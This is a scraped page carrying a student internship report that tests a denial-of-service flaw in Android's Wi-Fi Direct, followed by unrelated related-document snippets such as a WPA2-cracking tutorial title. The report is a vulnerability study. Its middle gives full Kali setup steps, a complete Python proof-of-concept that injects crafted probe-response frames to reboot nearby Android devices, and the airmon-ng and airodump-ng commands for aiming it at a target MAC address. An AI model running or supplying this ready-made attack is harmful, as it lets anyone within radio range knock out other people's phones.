MORAMPUDI RESHMA CHOWDARY Admn No: 2013JE0551 B.Tech Computer Science and Engineering

Size: px
Start display at page:

Download "MORAMPUDI RESHMA CHOWDARY Admn No: 2013JE0551 B.Tech Computer Science and Engineering"

Transcription

1 A SUMMER INTERNSHIP PROJECT REPORT on SECURITY OF Wi-Fi DIRECT IN ANDROID BASED DEVICES Submitted By MORAMPUDI RESHMA CHOWDARY Admn No: 2013JE0551 B.Tech Computer Science and Engineering Under the Guidance of Dr. Rajib Ranjan Maiti Assistant Professor, IDRBT, Hyderabad July 2015

2 CERTIFICATE This is to certify that the summer internship project report entitled Security of Wi-Fi Direct in Android based devices submitted to Institute for Development & Research in Banking Technology [IDRBT], Hyderabad is a bonafide record of work done by Morampudi Reshma Chowdary, Admn no. 2013JE0551, B.tech Computer Science and Engineering, Indian School of Mines, Dhanbad under my supervision from 9th May, 2015 to 8th July, 2015 Dr. Rajib Ranjan Maiti, Assistant Professor IDRBT, Hyderabad.

3 Acknowledgement I would like to express my sincere gratitude to the Institute for Development and Research in Banking Technology (IDRBT) and particularly Dr. Rajib Ranjan Maiti who was my guide for this project. This opportunity of learning about Computer Network and getting to know various ways of device to device communication was a boon to me as one rarely gets such exposure. I would like to add that this short period in IDRBT has added a different facet to my life as this is a unique organisation being a combination of academics, research, technology, communication services, crucial applications etc,. I am extremely grateful to Dr. Rajib Ranjan Maiti for his advice, innovative suggestions and supervision. I thank him for introducing me to this excellent area of Computer Networks for research. I am thankful to IDRBT for providing such an amazing platform for students, like me, to work in real application oriented research. I thank one and all who made this project successful either directly or indirectly. Morampudi Reshma Chowdary, ISM Dhanbad Project Trainee IDRBT Hyderabad.

4 Abstract Table of Contents 1. Introduction 1.1 Android versions supporting Wi-Fi Direct Device Discovery Procedure Service Discovery Procedure Group Owner Negotiation Message Exchange Group Formation Procedure WPS Provisioning and Address Configuration Tests of Vulnerability 2.1 Denial of Service Attack Tools Required for the attack 7 3. Procedure Proof of Concept code data format Observations Conclusion References..22 Abstract Wi-Fi Direct initially called Wi-Fi Peer to Peer is a Wi-Fi standard enabling devices to easily connect with each other without requiring a wireless access point. With the increasing benefits of direct device to device communication that is provided by Wi-Fi Direct, most of the Android Phones are deployed with the Wi-Fi Direct feature. But there is a serious vulnerability in many Android versions when they are communicating through Wi-Fi Direct. An attacker can perform Denial of Service attack on any of the device which is scanning for other Wi-Fi Direct devices, this attack is manifested with the rebooting of the device, which is attacked by the attacker. So, this causes dangerous situations which may lead to crashing of the operating system of the Android devices. In this paper we have tested all the devices which have Wi-Fi Direct feature and came up with a solution that which versions of the Android are safer to use while we are communicating through Wi-Fi Direct though an attacker tries to attack the device. For this purpose we have use the Proof of Concept code of the Android Wi-Fi Direct Denial of Service Vulnerability.

5 1. Introduction: WI-FI direct is a new technology defined by the WI-FI alliance aimed at enhancing direct device to device communication without requiring a third party wireless Access Point. WI-FI direct builds upon the successful IEEE infrastructure mode and lets devices negotiate who will take the AP-like functionalities. Direct peer to peer connectivity was already possible in original IEEE standard, but it contains many drawbacks such as lack of power saving or extended Quality of Service capabilities. The speed of communication using WI-FI direct is up to 250Mbps which is much higher than Bluetooth. The range of WI-FI direct is about 200 feet. Devices that are currently using WI-FI direct includes smart mobile devices, wireless printers, laptops, televisions etc. It is used for sharing files, images and for displaying miracast images. However, using WiFi Direct in mobile device imposes a degree of security challenges as it can be used for exchanging some security sensitive files such as bank statements, important images, so on. In this project, we investigate the security vulnerabilities on WiFi Direct protocol implemented in smart mobile phones. 1.1 Android Versions Supporting Wi-Fi direct: Nexus 5 - Android Nexus 4 - Android LG D806 - Android Samsung Android version 4.2.2, version 5.0.1, version and above versions. 1.2 Device Discovery Procedure

6 1.3 Service Discovery Procedure 1.4 Group Owner Negotiation Message Exchange 1.5 Group Formation Procedure

7 1.6 WPS Provisioning and Address Configuration WPS Provisioning Address Configuration Authentication request Authentication response DHCP Discover DHCP Offer DHCP Request DHCP ACK 2. Test of vulnerability: 2.1 Denial of Service attack: It is an attempt to make a device or resource unavailable to its intended users. In WI-FI Direct DoS attack makes the WI-FI Direct device which is scanning for other WI-FI direct device to reboot. Communicating P2P Device1 through wifi direct P2P Device2 (D1) (D2) DoS Attacker (A1) In the above scenario A1 makes a DoS attack on D2 2.2 Tools required for the Denial of service attack (DOS): Two Wi-Fi Direct enabled android devices (version>5.0) Two Wi-Fi Direct enabled android device (version<5.0) Laptop or system which acts as an attacker. Proof of concept code 3. Procedure: To run Proof of concept code for Denial of Service attack in WI-FI DIRECT: This the Proof of Concept code: Get the PoC from In Kali linux, open the terminal To run as a root

8 Store PoC code in a python file called poc.py, and place it in desktop The packages needed to install are the following: For Down loading m4: Open the terminal then Run the command below wget ftp://ftp.gnu.org/gnu/m tar.gz Extract the file from downloaded m4 package tar xvzf m tar.gz Enter the directory where the downloaded m4 package is extracted cd m Configure downloaded m4 package./configure Install the package make && make install cd.. cd.. is used to get out of the present working directory. Download Bison Run the command below wget Extract file from downloaded Bison package tar xvzf bison-2.3.tar.gz Enter the directory where the downloaded bison package is extracted cd bison2.3 PATH=$PATH: /usr/local/bin/ cd.. Configure downloaded m4 package./configure Install the package make && make install Download libnl Extract file from downloaded libnl package

9 cd.. tar xf libnl tar.gz Enter the directory where the downloaded libnl package is extracted cd libnl Configure downloaded package./configure --libdir =/usr/lib Install the package make && make install Download libpcap Extract file from downloaded libpcap package tar xf libpcap tar.gz Enter the directory where the downloaded libpcap package is extracted cd libpcap Configure downloaded package./configure libdir=/usr/lib Install the package make && make install cd.. Install necessary software to build lorcon2 and pylorcon2. apt-get install libpcap-dev libnl-dev pythondev Download lorcon git clone Enter the directory where Lorcon is downloaded cd lorcon Configure the package./configure --libdir=/usr/lib Install lorcon make && make install cd.. Download pylorcon2

10 Enter the directory where PyLorcon2 is downloaded cd pylorcon2 Build the package Python setup.py build Install the package Python setup.py install cd.. Download the installation package of airdrop-ng svn co Aircrack-ng is an WEP (Wired Equivalent Privacy) and WPA-PSK (Wi-Fi Protected Access- Pre Shared Key) keys cracking program that can recover keys once enough data packets have been captured. Install the launcher airdrop-ng/old-installers/install.py Answer y to all the questions Continue with the installer? (y/n): y Install airdrop-ng? (y/n) : y Would you like to install lorcon? (y/n) : y Would you like to install pylorcon? (y/n): y Clean up? (y/n): y The above questions are popped up on the terminal when you are trying to run the command. Updates the airodump-ng-oui File airodump-ng-oui-update Enter the directory where the airdrop-ng package is downladed cd airdrop-ng Move the airdrop-ng file in /usr/bin and the application in it airdrop cd-bg mv airdrop /usr/bin/airdrop mv airdrop-ng /usr/bin/airdrop-ng After installing all the above packages run the following commands

11 LD_LIBRARY_PATH is the predefined environmental variable in Linux which sets the path which the linker should look in to while linking dynamic libraries/shared libraries. LD_LIBRARY_PATH =/usr/local/lib Export LD_LIBRARY_PATH Enter the directory where the poc is placed cd Desktop python poc.py -> This is the file where PoC is saved. Checks for the interfering processes and kills off them airmon-ng check kill Enables the monitor mode airmon-ng start wlan0 airodump-ng displays a list of detected access points, and also a list of connected clients airodump-ng wlan0mon Inject PoC by running the below command python poc.py wlan0mon MAC address MAC address in the above line is the BSSID in the list obtained when airodump-ng wlan0mon is executed and make sure that BSSID is taken for which column probes contains DIRECT. Airmon-ng: Airmon-ng script is used to enable the monitor mode on wireless interfaces. The monitor mode allows a device to capture the frames without having to associate with an AP. When you run the airmon-ng script, it gives the wireless card name such as wlan0. It may also be used to go back from monitor mode to managed mode. Entering the airmon-ng commands without parameters will show the interface status. The airmon-ng start wlan0 command will start wlan0 monitor mode, and mon0 captures wireless packets. Usage: airmon-ng <start stop> <interface> [channel] or airmon-ng <check check kill> <start stop> indicates if you wish to start or stop the interface <interface> specifies the interface [channel] optionally set the card to a specific channel <check check kill> check will show any processes that might interface with the aircrack-ng suite. It is strongly recommended that these processes be eliminated prior to using the aircrack-ng suite. check kill will check and kill off processes that might interfere with the aircrack-ng suite.

12 Airdrop-ng It is a Rule Based Wireless De authentication Tool. Description: Airdrop-ng is a program used for targeted, rule based de authentication of users. It can target based on MAC address, type of hardware, (by using OUI lookup, IE, APPLE devices) or completely de authenticate ALL users. Lorcon and pylorcon are used in the transmission of the de authentication packets Dependencies Supports Python 2.6 and may support 2.5 and 2.4 versions 1. Lorcon version 1 2. Pylorcon 3. A lorcon supported wireless card with monitor mode and injection PyLorcon2 is a wrapper for the Lorcon2 library Lorcon2 (Loss of Radio Connectivity) is a generic library for injecting frames, capable of injection via multiple driver frameworks, without forcing modification of the application code for each platform/driver. Requirements: Python >= 2.5 and Lorcon2 are required to build PyLorcon2 airodump-ng is used for packet capturing of raw frames and is particularly suitable for collecting WEP IVs (initialization vector) for the intent of using them with aircrack-ng. airodumpng writes out several files containing the details of all access points and clients seen. 3.1 Proof of Concept code: import sys import time import struct import PyLorcon2 def get_probe_response(source, destination, channel): frame = str() frame += \x50\x00 frame += \x00\x00 # Data Packet or Ethernet Frame # Frame Control # Duration of the frame frame += destination frame +=source frame += source same) #BSSID (In WI-FI Direct source address and BSSID of access point are

13 frame += \x00\x00 #Sequence control frame += \x00\x00\x00\x00\x00\x00\x00\x00 #Timestamp frame += \x64\x00 frame += \x30\x04 #Beacon Interval #Capabilities Information # SSID IE frame += \x00 frame += \x07 frame += DIRECT- SSID: Present in all Beacons, probe requests, probe response, association request, association response. Element ID is 0 for SSID IE. SSID could have maximum of 32 characters. Parameters in SSID Information Element: Element ID: 0 SSID [36] Length: 7 [37] SSID: variable length (in this case DIRECT is used) # Supported Rates frame += \x01 frame += \x08 frame += \x8c\x12\x98\x24\xb0\x48\x60\x6c Supported Rates: This is present in Beacons, probe request, probe response, association request, association response, authentication request, authentication response. It is an 8 octet field where each octet describe a single supported rate. Last bit (7 th ) of each octet indicate whether the data rate is basic rate or mandatory or supported rate.if the 7 th bit is 1 it indicates a basic rate where as if value is 0 it indicates a supported rate. The next 7 bits (0-6) specify the data rate value.expansion of Supported Rate of a Beacon. It has Parameters present in Supported rates of Beacon Frame: Element ID: 1 Length: 8 Supported Rates: variable length. # DS Parameter Set frame += \x03 frame += \x01 frame +=struct.pack( B,channel) # P2P frame += \xdd

14 frame += \x27 frame += \x50\x6f\x9a frame += \x09 #P2P Capabilities frame += \x02 frame += \x02\x00 #ID #Length frame += \x21\x00 # P2P Device Info frame += \x0d frame += \x1b\x00 #ID #Length frame += source frame += \x01\x88 frame += \x00\x0a\x00\x50\xf2\x04\x00\x05 frame += \x00 frame += \x10\x11 frame += \x00\x06 frame += fafa\xfa\xfa return frame def str_to_mac(address): return.join(map(lambda i: chr(int(i,16)), address.spilt( : ))) #A lambda creates an anonymous function without a name. A lambda may have any number of arguments. The above function str_to_mac(address) converts the string to MAC address format like aa:bb:cc:dd:ee:ff if name == main : if len(sys.argv)!=3: print Usage: print poc.py <iface> <target> print Example: print poc.py wlan0 00:11:22:33:44:55 sys.exit(-1) iface = sys.argv[1] destination = str_to_mac(sys.argv[2]) #this gives the destination address context = PyLorcon2.Context(iface)

15 context.open_injmon() channel = 1 #the attacker sends the frames through this channel source = str_to_mac( 00:11:22:33:44:55 ) #this gives the source address in the MAC format frame =get_probe_response(source, destination, channel) print Injecting PoC. for i in range(100): context.send_bytes(frame) time.sleep(0.100) #sends response to the probe request made by the WI-FI DIRECT device in the form of frames. If the Device receiving the probe response is vulnerable to these frames it reboots. 3.2: data format: The three major types of frames that exist in are Data frame Control frame Management frame These frames are assisted by the MAC layer. Beacon frame Structure: MAC header 1. Frame Control 2. Duration ID 3. Address 1 (Probe request receiver address) 4. Address 2 (Probe request transmitted address) 5. Address 3 6. Sequence control 7. Address 4 Address 1 is the Destination address, Address 2 is the Source Address, Address 3 is BSSID of the Access Point. In WI-FI DIRECT any one of the Address 1 or Address 2 acts as the BSSID of the Access point. This happens so because one of the devices acts as the Access point in a Peer to Peer Group. Management Frame:

16 Authentication frame, De authentication frame, association request frame, disassociation frame, probe request frame, probe response frame. Connection between clients and Aps is established by the exchange of various frames. Beacon frame: The access point periodically sends a beacon frame to advertise its presence. The beacon frame contains information such as SSID, channel number, BSSID, and so on. Probe request: The wireless device (client) sends out a probe request to determine which Aps are in range. The probe request contains elements such as the SSID of the AP, supported rates, vendor specific information, and so on. The clients sends the probe request and waits for the probe response for some time. Probe response: In the response of the probe request, the corresponding AP will responds with a probe response frame that contains the capability information, supported rates and so on. Authentication request: The client sends the authentication request frame that contains its identity Authentication response: The access point responds with an authentication, which indicates acceptance or rejection. If shared key authentication exists, such as WEP, then the AP sends a challenge text in the form of an authentication response. The client must send the encrypted form of the challenged text in an authentication frame back to the AP. Association request: After successful authentication, the client sends an association request that contains its characteristics, such as supported data rates and the SSID of the AP. Association response: AP sends an association response that contains acceptance or rejection. In the case of acceptance, the AP will create an association ID for the client. Mandatory fields in beacon frame: SSID: It is a 0-32 alphanumeric unique identifier for a wireless LAN, it is human readable, and simply put, it is the network name. BSSID: It is the MAC address of the wireless Access Point Channel number: This represents the range of radio frequency used by the Access Point for transmission. Timestamp (8 byte) Beacon interval (2 byte) Capability info (2 byte) SSID (variable size) Supported Rates (variable size) The scenario when Wi-Fi direct device scans for other Wi-Fi direct device and the attacker trying to attack that device: When a Wi-Fi Direct enabled device scans for another Wi-Fi Direct enabled device the device sends some probe requests for scanning through channels.

17 At this spur of time an attacker aiming at attacking the Wi-Fi direct device sends a specially crafted probe response frame causing the Dalvik subsystem of Wi-Fi direct device to reboot because of an unhandled exception on Wi-Fi monitor class. DALVIK: It is a discontinued process virtual machine in Google s Android operating system that executes applications written for Android. Dalvik is an integrated part of the Android software stack in Android version 4.4 and earlier, which is typically used on Android mobile phones. Programs for Android are typically written in Java and compiled to bytecode for the Java virtual machine, which is then translated to Dalvik bytecode and stored in.dex (Dalvik Executable) and.odex (Optimized Dalvik Executable) files. The odex file is run on Dalvik virtual machine and output is generated. The Proof of Concept code is implemented using the open source library Lorcon and PyLorcon2, a Python wrapper for the Lorcon library. If the attacker sends a malformed wpa_supplicant value then the Android s Wi-Fi P2P Device class throws an Illegal Argument Exception, crashing the device: a device name attribute with specific bytes generates a malformed supplicant event string that ends up throwing the Illegal Argument Exception. Android makes use of a modified wpa_supplicant in order to provide an interface between the wireless driver and the android platform framework. The Wi-Fi Direct specification defines the P2P discovery procedure to enable P2P devices to exchange device information, the device name is part of the information. wpa_supplicant is a cross-platform supplicant with support for WEP, WPA and WPA2 (IEEE i / Robust Secure Network). It is suitable for desktops, laptops and embedded systems. wpa_supplicant is the IEEE 802.1X/WPA component that is used in the client stations. It implements key negotiation with a WPA authenticator and controls the roaming and IEEE authentication/association of the wireless driver. In Kali linux open the terminal, follow the steps below. Give the path where all the directories are stored. Create the environment. The command used is LD_LIBRARY_PATH=/usr/local/lib/ export LD_LIBRARY_PATH Enter the directory where the python code is stored. cd Desktop 4. Observations: Check for the interfering processes, if any process is found interfering kill the process. airmon-ng check kill Enable the monitor mode airmon-ng start wlan0 FIGURE-1

18 Run the command airodump-ng wlan0mon Observe what is happening for atleast 10 minutes. airodump-ng displays a list of detected access points. In figure-2 BSSID represent the MAC addresses of the devices which are in the vicinity of the network the laptop or system you are using. The laptop here serves as an attacker sends the Beacons to the devices in the BSSID list. Observe in the figure that in column CH 1,6,11 channels are mainly used.the reason is that these channels are non-overlapping channels and are known as social channels. In ENC, it is specified that by which method the data is encrypted.essid is the name of the networks in the proximity of the device on which you are running the airodump command.

19 FIGURE-2 In AUTH column PSK indicates Pre Shared Key.It keeps on sending the beacons the process never stops.in Figure-3 it is observed that some devices are sending probe requests In column Probe, the device with Probe as DIRECT confirms that it is sending probe requests that means it is scanning for other DIRECT devices in its range. Run the command python poc.py MAC address MAC address in the above command is the value that is against DIRECT in the column STATION. When we run the above command what it does is it sends response to the probe what the WI-FI DIRECT device as sent. The attacker s motto is to reboot the WI-FI DIRECT device. So the response that is send injects the proof of concept code into the WI-FI DIRCT devices this code throws an exception when the WIFI- DIRECT code is executed which causes the Dalvik subsystem to reboot. FIGURE-3

20 Scenario 1: Device1 Android version Scanning for WI-FI Device Device2 Android version Injecting Poc DoS Attacker Device1 is rebooted. Scenario 2: Device1 Android version Injecting Poc Scanning for WI-FI Device DoS Attacker Device2 Android version In the above scenario device1 is not rebooted and the two devices device1 and device2 can communicate with each other.

21 Scenario 3: Device1 Android version Injecting Poc Scanning for WI-FI Device DoS Attacker Device2 Android version In the above scenario the device1 is rebooted. Scenario 4: Device1 Android version Injecting Poc Scanning for WI-FI Device DoS Attacker Device2 Android version In the above scenario device1 is not affected and the two devices device1 and device2 communicated through WI-FI Direct. 5. Conclusion In this study, we investigated the denial of service attack vulnerability in device to device communication using WIFI direct protocol. We consider Android based mobile devices (Samsung Galaxy Note 2) and different versions of Android that implements WIFI Direct for the same. Our objective is to ensure that the devices using WIFI Direct services communicate safely even in presence of adversary across different versions of Android. In this direction, two android versions are considered, versions and versions 5.1.1, and an attacker that launches a denial of service attack to one of these devices that are running one of the two versions of Android. It is observed that the attacker can successfully launch the attack on WIFI Direct in Android whenever it tries to communicate with another device with Android or A successful attack gets manifested in terms of device rebooting. However, the attack is not successful when it is targeting a device with Android 5.1.1, in fact, such a device can properly perform communication with any other device irrespective of whether it is using Android or Hence, the devices running android version or later are not vulnerable to the kind of denial of service attack we have considered. 6. References [1] IEEE Standard, Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications, [2] J.R. Jiang, Y.C. Tseng C.S. Hsu and T.H. Lai.(2005)Quorum-based asynchronous powersaving protocols for ad hoc networks

22 [3] Wi-Fi Alliance, P2P Technical Group, Wi-Fi Peer-to-Peer (P2P) Technical Specification v1.0, December [4] Wi-Fi Alliance, Wi-Fi Protected Setup Specification v1.0h, Dec [5] u Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) specifications Amendment 9: Interworking with External Networks. [6] Wi-Fi Alliance R. Technical Committee (2012). Wi-Fi Direct Services Task Group. Wi-Fi Direct Services Draft Technical Specification Version 0.5. [7] D. Camps-Mur, A. Garcia-Saavedra, and P. Serrano, Device to device communications with wifi direct: overview and experimentation, IEEE Wireless Communications Magazine, [8] R. H. Kravets, Enabling social interactions off the grid, Pervasive Computing, IEEE, vol. 11, no. 2, pp. 8 11, [9] S. Viehb ock, Brute forcing wi-fi protected setup, Wi-Fi Protected Setup. Retrieved March, [10] y.com/advisories/android-wifi-direct-denial-service

23

Investigating the Quality of VoIP Traffic Over IPv6 Enabled Network

Investigating the Quality of VoIP Traffic Over IPv6 Enabled Network A SUMMER INTERNSHIP PROJECT REPORT on Investigating the Quality of VoIP Traffic Over IPv6 Enabled Network Submitted By Borra Sahithi Admn No: 2013JE0619 B.Tech CSE Sai Sandeep Bhooshi M.S (EE) I Year,

More information

Wireless technology Principles of Security

Wireless technology Principles of Security Wireless technology Principles of Security 1 Wireless technologies 2 Overview This module provides an introduction to the rapidly evolving technology of wireless LANs (WLANs). WLANs redefine the way the

More information

5 Steps Wifi Hacking Cracking WPA2 Password

5 Steps Wifi Hacking Cracking WPA2 Password Advertise Here Contact Us Request Tutorial Write for Us Download» Hacking Knowledge Hacking News Hacking Tutorial Hacking Widget Online Tools» Tips and Trick Website» Phone Hacking Search 9,517 91 +525

More information

CSNT 180 Wireless Networking. Chapter 7 WLAN Terminology and Technology

CSNT 180 Wireless Networking. Chapter 7 WLAN Terminology and Technology CSNT 180 Wireless Networking Chapter 7 WLAN Terminology and Technology Norman McEntire norman.mcentire@servin.com Founder, Servin Corporation, http://servin.com Technology Training for Technology Professionals

More information

Wireless Security. Comp Sci 3600 Security. Attacks WEP WPA/WPA2. Authentication Encryption Vulnerabilities

Wireless Security. Comp Sci 3600 Security. Attacks WEP WPA/WPA2. Authentication Encryption Vulnerabilities Wireless Security Comp Sci 3600 Security Outline 1 2 3 Wired versus wireless Endpoint Access point Figure 24.1 Wireless Networking Components Locations and types of attack Outline 1 2 3 Wired Equivalent

More information

Hacking Encrypted Wireless Network

Hacking Encrypted Wireless Network Hacking Encrypted Wireless Network Written by Fredrik Alm CompuTechSweden 2010 http://www.fredrik-alm.se/ REQUIREMENTS Software: Operating System: Linux kernel (Recommended: BackTrack 4 Final ) Download:

More information

CYBER ATTACKS EXPLAINED: WIRELESS ATTACKS

CYBER ATTACKS EXPLAINED: WIRELESS ATTACKS CYBER ATTACKS EXPLAINED: WIRELESS ATTACKS Wireless networks are everywhere, from the home to corporate data centres. They make our lives easier by avoiding bulky cables and related problems. But with these

More information

Appendix E Wireless Networking Basics

Appendix E Wireless Networking Basics Appendix E Wireless Networking Basics This chapter provides an overview of Wireless networking. Wireless Networking Overview The FWG114P v2 Wireless Firewall/Print Server conforms to the Institute of Electrical

More information

Wireless Attacks and Countermeasures

Wireless Attacks and Countermeasures Wireless Attacks and Countermeasures Wireless Network Technology Wireless network refers to any type of computer network which is wireless, and is commonly associated with a network whose interconnections

More information

A Configuration Protocol for Embedded Devices on Secure Wireless Networks

A Configuration Protocol for Embedded Devices on Secure Wireless Networks A Configuration Protocol for Embedded Devices on Secure Wireless Networks Larry Sanders lsanders@ittc.ku.edu 6 May 2003 Introduction Wi-Fi Alliance Formally Wireless Ethernet Compatibility Alliance (WECA)

More information

ProbeQuest Documentation

ProbeQuest Documentation ProbeQuest Documentation Release 0.7.0 Paul-Emmanuel Raoul Oct 08, 2018 Table of Contents 1 What are Wi-Fi probe requests? 3 2 Installation 5 2.1 Using pip (recommended)........................................

More information

Outline : Wireless Networks Lecture 10: Management. Management and Control Services : Infrastructure Reminder.

Outline : Wireless Networks Lecture 10: Management. Management and Control Services : Infrastructure Reminder. Outline 18-759: Wireless Networks Lecture 10: 802.11 Management Peter Steenkiste Departments of Computer Science and Electrical and Computer Engineering Spring Semester 2016 http://www.cs.cmu.edu/~prs/wirelesss16/

More information

D. The bank s web server is using an X.509 certificate that is not signed by a root CA, causing the user ID and password to be sent unencrypted.

D. The bank s web server is using an X.509 certificate that is not signed by a root CA, causing the user ID and password to be sent unencrypted. Volume: 119 Questions Question No: 1 John Smith uses a coffee shop's Internet hot-spot (no authentication or encryption) to transfer funds between his checking and savings accounts at his bank's website.

More information

WAP3205 v2. User s Guide. Quick Start Guide. Wireless N300 Access Point. Default Login Details. Version 1.00 Edition 2, 12/2012

WAP3205 v2. User s Guide. Quick Start Guide. Wireless N300 Access Point. Default Login Details. Version 1.00 Edition 2, 12/2012 WAP3205 v2 Wireless N300 Access Point Version 1.00 Edition 2, 12/2012 Quick Start Guide User s Guide Default Login Details LAN IP Address http://192.168.1.2 Password 1234 www.zyxel.com Copyright 2012 ZyXEL

More information

Complexity. An introduction to protocol chaos. Andrés Blanco. CC License - Swtiruty Rgbytw

Complexity. An introduction to protocol chaos. Andrés Blanco.   CC License - Swtiruty Rgbytw 802.11 Complexity An introduction to 802.11 protocol chaos Andrés Blanco Email: 6e726d@gmail.com Twitter: @6e726d CC License - Swtiruty Rgbytw Motivation 802.11 it s everywhere https://twitter.com/skrud/status/767243097331736578

More information

Experimenting opportunistic networks with WiFi Direct

Experimenting opportunistic networks with WiFi Direct Experimenting opportunistic networks with WiFi Direct Marco Conti, Franca Delmastro, Giovanni Minutiello, Roberta Paris Institute of Informatics and Telematics (IIT) National Research Council of Italy,

More information

Networking Basics. Crystal Printer Network Installation Guidelines

Networking Basics. Crystal Printer Network Installation Guidelines Networking Basics & Crystal Printer Network Installation Guidelines 1. Overview This guide is intended to provide the necessary basic knowledge of wireless networking needed to enable the Crystal printer

More information

LevelOne User Manual WNC-0600USB N_One Wireless USB Adapter

LevelOne User Manual WNC-0600USB N_One Wireless USB Adapter LevelOne User Manual WNC-0600USB N_One Wireless USB Adapter V2.0.0-0712 i Safety FCC WARNING This equipment has been tested and found to comply with the limits for a Class B digital device, pursuant to

More information

AmbiCom WL11-SD Wireless LAN SD Card. User Manual

AmbiCom WL11-SD Wireless LAN SD Card. User Manual AmbiCom WL11-SD Wireless LAN SD Card User Manual Version 3.0 October 15, 2004 Table of Contents 1 WL11-SD features...3 2 Package Contents & System Requirements...3 2.1 Package Contents... 3 2.2 System

More information

Content. Chapter 1 Product Introduction Package Contents Product Features Product Usage... 2

Content. Chapter 1 Product Introduction Package Contents Product Features Product Usage... 2 Content Chapter 1 Product Introduction... 2 1.1 Package Contents... 2 1.2 Product Features... 2 1.3 Product Usage... 2 1.4 Before Installation... 2 1.5 Disable other manufacturers wireless network adapters...

More information

Troubleshooting Microsoft Windows XP-based Wireless Networks in the Small Office or Home Office

Troubleshooting Microsoft Windows XP-based Wireless Networks in the Small Office or Home Office Operating System Troubleshooting Microsoft Windows XP-based Wireless Networks in the Small Office or Home Office Microsoft Corporation Published: December 2004 Update: May 2005 Abstract Because small office/home

More information

Outdoor High Power b/g/n Wireless USB Adapter USER MANUAL 4.0

Outdoor High Power b/g/n Wireless USB Adapter USER MANUAL 4.0 Outdoor High Power 802.11b/g/n Wireless USB Adapter USER MANUAL 4.0 2012 Contents 1 Introduction... 3 2 Hardware Installation... 4 3 Driver Installation... 6 3.1 Windows XP... 6 3.2 Windows Vista... 9

More information

Exam HP2-Z32 Implementing HP MSM Wireless Networks Version: 7.1 [ Total Questions: 115 ]

Exam HP2-Z32 Implementing HP MSM Wireless Networks Version: 7.1 [ Total Questions: 115 ] s@lm@n HP Exam HP2-Z32 Implementing HP MSM Wireless Networks Version: 7.1 [ Total Questions: 115 ] HP HP2-Z32 : Practice Test Question No : 1 What is a proper use for an ingress VLAN in an HP MSM VSC?

More information

AWUS036NHR Long-Range Indoor IEEE n USB Adapter User Manual

AWUS036NHR Long-Range Indoor IEEE n USB Adapter User Manual AWUS036NHR Long-Range Indoor IEEE 802.11n USB Adapter User Manual Alfa Network, Inc. Page 1 Table of Content Overview... 3 Unpacking information... 3 Introduction to the AWUS036NHR Indoor USB Adapter...

More information

Missouri University of Science and Technology ACM SIG-Security 2014 Wi-Fi Workshop Exploitation Handbook

Missouri University of Science and Technology ACM SIG-Security 2014 Wi-Fi Workshop Exploitation Handbook Missouri University of Science and Technology ACM SIG-Security 2014 Wi-Fi Workshop Exploitation Handbook 1 2 The information provided in this manual is to be used for educational purposes only. The authors

More information

802.11b+g Wireless LAN USB Adapter. User Manual

802.11b+g Wireless LAN USB Adapter. User Manual 802.11b+g Wireless LAN USB Adapter User Manual REGULATORY STATEMENTS FCC Certification The United States Federal Communication Commission (FCC) and the Canadian Department of Communications have established

More information

2013 Summer Camp: Wireless LAN Security Exercises JMU Cyber Defense Boot Camp

2013 Summer Camp: Wireless LAN Security Exercises JMU Cyber Defense Boot Camp 2013 Summer Camp: Wireless LAN Security Exercises 2013 JMU Cyber Defense Boot Camp Questions Have you used a wireless local area network before? At home? At work? Have you configured a wireless AP before?

More information

Viewing Status and Statistics

Viewing Status and Statistics CHAPTER 7 This chapter explains how to use ADU to view the client adapter s status and its transmit and receive statistics. The following topics are covered in this chapter: Overview of ADU and Statistics

More information

U S E R M A N U A L b/g PC CARD

U S E R M A N U A L b/g PC CARD U S E R M A N U A L 802.11b/g PC CARD Table of Content CHAPTER 1 INTRODUCTION... 1 1.1 WIRELESS LAN FEATURE FUNCTIONS... 1 1.2 REGULATORY NOTICE... 1 1.2.1 FCC Class B Statement...1 1.2.2 Canadian Regulatory

More information

Wireless Networking WiFi Standards 802.11a 5GHz 54MB 802.11b 2.4 GHz 11MB 802.11g 2.4GHz 52MB 802.11n 2.4/5GHz 108MB 802.11b The 802.11b standard has a maximum raw data rate of 11 Mbit/s, and uses

More information

WAP6405. User s Guide. Quick Start Guide. 5GHz AC1750 Gigabit Wireless Bridge. Default Login Details. Version 1.00 Edition 1, 06/2016

WAP6405. User s Guide. Quick Start Guide. 5GHz AC1750 Gigabit Wireless Bridge. Default Login Details. Version 1.00 Edition 1, 06/2016 WAP6405 5GHz AC1750 Gigabit Wireless Bridge Version 1.00 Edition 1, 06/2016 Quick Start Guide User s Guide Default Login Details LAN IP Address http://192.168.1.2 (AP Mode) http://192.168.1.5 (Repeater

More information

Chapter 7. Basic Wireless Concepts and Configuration. Part I

Chapter 7. Basic Wireless Concepts and Configuration. Part I Chapter 7 Basic Wireless Concepts and Configuration Part I CCNA3-1 Chapter 7-1 Note for Instructors These presentations are the result of a collaboration among the instructors at St. Clair College in Windsor,

More information

The 8 th International Scientific Conference DEFENSE RESOURCES MANAGEMENT IN THE 21st CENTURY Braşov, November 14 th 2013

The 8 th International Scientific Conference DEFENSE RESOURCES MANAGEMENT IN THE 21st CENTURY Braşov, November 14 th 2013 The 8 th International Scientific Conference DEFENSE RESOURCES MANAGEMENT IN THE 21st CENTURY Braşov, November 14 th 2013 Florin OGÎGĂU-NEAMŢIU National Defense University of Romania "Carol I"/ The Regional

More information

Adding Unusual Transports to The Serval Project

Adding Unusual Transports to The Serval Project Adding Unusual Transports to The Serval Project Alexandros Tsiridis & Joseph Hill Supervised by: Dr. Paul Gardner-Stephen The Serval Project Serval is a telecommunications system comprised of at least

More information

INTERNATIONAL JOURNAL OF PURE AND APPLIED RESEARCH IN ENGINEERING AND TECHNOLOGY

INTERNATIONAL JOURNAL OF PURE AND APPLIED RESEARCH IN ENGINEERING AND TECHNOLOGY INTERNATIONAL JOURNAL OF PURE AND APPLIED RESEARCH IN ENGINEERING AND TECHNOLOGY A PATH FOR HORIZING YOUR INNOVATIVE WORK ANALYSIS OF PENETRATION TESTING AND COUNTERMEASURES FOR SECURING WIRELESS NETWORK

More information

Wi-Fi Range Extension via Smart Phones (Android)

Wi-Fi Range Extension via Smart Phones (Android) Wi-Fi Range Extension via Smart Phones (Android) V. R. Ghule #1, A. H. Kshirsagar #2, N. J. Jivane #3 Department of Computer Engineering, University of Pune, SKNCOE, Vadgaon (Bk.), Pune, Maharashtra, India

More information

Wireless LANs. ITS 413 Internet Technologies and Applications

